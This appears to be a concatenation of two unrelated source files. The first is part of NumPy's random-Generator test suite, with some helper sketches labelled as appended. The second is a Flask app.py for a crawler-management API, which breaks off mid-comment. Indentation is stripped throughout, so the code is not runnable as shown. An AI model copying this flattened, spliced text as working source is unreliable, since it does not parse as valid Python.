assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
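# Illustrative sketch (appended, not part of the original suite): the
# TestBroadcast class above checks that distribution parameters broadcast
# against each other like ordinary ufunc operands, so a length-3 `loc`
# paired with a scalar `scale` yields three draws.
def _example_parameter_broadcasting(seed=123456789):
    from numpy.random import Generator, MT19937
    rng = Generator(MT19937(seed))
    draws = rng.normal(loc=[0.0, 1.0, 2.0], scale=1.0)
    assert draws.shape == (3,)  # one draw per broadcast element
    return draws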
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
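# Illustrative sketch (appended, not part of the original suite): the
# TestThread class above relies on each thread owning its own seeded
# Generator, so threaded and serial generation produce identical output.
# A bare-bones version of that per-thread-generator pattern:
def _example_per_thread_generators(seeds=(0, 1, 2, 3), n=1000):
    import numpy as np
    from threading import Thread
    from numpy.random import Generator, MT19937

    out = np.empty((len(seeds), n))

    def fill(generator, row):
        # each thread writes into its own pre-allocated output row
        row[...] = generator.normal(size=n)

    threads = [Thread(target=fill, args=(Generator(MT19937(s)), row))
               for s, row in zip(seeds, out)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return out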
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
@pytest.mark.parametrize("config", JUMP_TEST_DATA)
def test_jumped(config):
# Each config contains the initial seed, a number of raw steps,
# the md5 hashes of the initial and the final states' keys, and
# the position of the initial and the final state.
# These were produced using the original C implementation.
seed = config["seed"]
steps = config["steps"]
mt19937 = MT19937(seed)
# Burn step
mt19937.random_raw(steps)
key = mt19937.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert mt19937.state["state"]["pos"] == config["initial"]["pos"]
assert md5.hexdigest() == config["initial"]["key_md5"]
jumped = mt19937.jumped()
key = jumped.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert jumped.state["state"]["pos"] == config["jumped"]["pos"]
assert md5.hexdigest() == config["jumped"]["key_md5"]
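# Illustrative sketch (not taken from the original file): `jumped()` returns a
# new MT19937 whose state has been advanced as if a very large number of draws
# had already been made, which is the usual way to derive independent,
# non-overlapping streams for parallel workers.
def _example_jumped_streams(seed=1234, n_streams=4):
    from numpy.random import Generator, MT19937
    bit_generator = MT19937(seed)
    generators = []
    for _ in range(n_streams):
        generators.append(Generator(bit_generator))
        bit_generator = bit_generator.jumped()  # state for the next stream
    return generators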
def test_broadcast_size_error():
mu = np.ones(3)
sigma = np.ones((4, 3))
size = (10, 4, 2)
assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=size)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(1, 3))
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(4, 1, 1))
# 1 arg
shape = np.ones((4, 3))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=size)
with pytest.raises(ValueError):
random.standard_gamma(shape, size=(3,))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=3)
# Check out
out = np.empty(size)
with pytest.raises(ValueError):
random.standard_gamma(shape, out=out)
# 2 arg
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.multinomial([2, 2], [.3, .7], size=(2, 1))
# 3 arg
a = random.chisquare(5, size=3)
b = random.chisquare(5, size=(4, 3))
c = random.chisquare(5, size=(5, 4, 3))
assert random.noncentral_f(a, b, c).shape == (5, 4, 3)
with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"):
random.noncentral_f(a, b, c, size=(6, 5, 1, 1))
def test_broadcast_size_scalar():
mu = np.ones(3)
sigma = np.ones(3)
random.normal(mu, sigma, size=3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=2)
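# Illustrative sketch (appended, not part of the original suite): every test
# above hard-codes a `desired` array, which works because re-seeding MT19937
# with the same value reproduces exactly the same stream of draws.
def _example_reproducible_stream(seed=1234567890, n=5):
    import numpy as np
    from numpy.random import Generator, MT19937
    first = Generator(MT19937(seed)).normal(size=n)
    second = Generator(MT19937(seed)).normal(size=n)
    assert np.array_equal(first, second)  # identical seed -> identical draws
    return first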
|
app.py
|
import os
import sys
from multiprocessing import Process
from flask import Flask
from flask_cors import CORS
from flask_restful import Api
# from flask_restplus import Api
from routes.sites import SiteApi
from utils.log import other
from constants.node import NodeStatus
from db.manager import db_manager
from routes.schedules import ScheduleApi
from tasks.celery import celery_app
from tasks.scheduler import scheduler
file_dir = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.abspath(os.path.join(file_dir, '.'))
sys.path.append(root_path)
from config import FLASK_HOST, FLASK_PORT, PROJECT_LOGS_FOLDER
from routes.deploys import DeployApi
from routes.files import FileApi
from routes.nodes import NodeApi
from routes.spiders import SpiderApi, SpiderImportApi, SpiderManageApi
from routes.stats import StatsApi
from routes.tasks import TaskApi
# flask app instance
app = Flask(__name__)
app.config.from_object('config')
# init flask api instance
api = Api(app)
# cors support
CORS(app, supports_credentials=True)
# reference api routes
api.add_resource(NodeApi,
'/api/nodes',
'/api/nodes/<string:id>',
'/api/nodes/<string:id>/<string:action>')
api.add_resource(SpiderApi,
'/api/spiders',
'/api/spiders/<string:id>',
'/api/spiders/<string:id>/<string:action>')
api.add_resource(SpiderImportApi,
'/api/spiders/import/<string:platform>')
api.add_resource(SpiderManageApi,
'/api/spiders/manage/<string:action>')
api.add_resource(TaskApi,
'/api/tasks',
'/api/tasks/<string:id>',
'/api/tasks/<string:id>/<string:action>')
api.add_resource(DeployApi,
'/api/deploys',
'/api/deploys/<string:id>',
'/api/deploys/<string:id>/<string:action>')
api.add_resource(FileApi,
'/api/files',
'/api/files/<string:action>')
api.add_resource(StatsApi,
'/api/stats',
'/api/stats/<string:action>')
api.add_resource(ScheduleApi,
'/api/schedules',
'/api/schedules/<string:id>')
api.add_resource(SiteApi,
'/api/sites',
'/api/sites/<string:id>',
'/api/sites/get/<string:action>')
def monitor_nodes_status(celery_app):
def update_nodes_status(event):
node_id = event.get('hostname')
db_manager.update_one('nodes', id=node_id, values={
'status': NodeStatus.ONLINE
})
def update_nodes_status_online(event):
other.info(f"{event}")
with celery_app.connection() as connection:
recv = celery_app.events.Receiver(connection, handlers={
'worker-heartbeat': update_nodes_status,
# 'worker-online': update_nodes_status_online,
})
recv.capture(limit=None, timeout=None, wakeup=True)
# run scheduler as a separate process
scheduler.run()
# monitor node status
p_monitor = Process(target=monitor_nodes_status, args=(celery_app,))
p_monitor.start()
# create folder if it does not exist
if not os.path.exists(PROJECT_LOGS_FOLDER):
os.makedirs(PROJECT_LOGS_FOLDER)
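# Minimal sketch (hypothetical, for illustration only): one of the routes
# registered above can be exercised with Flask's built-in test client. The
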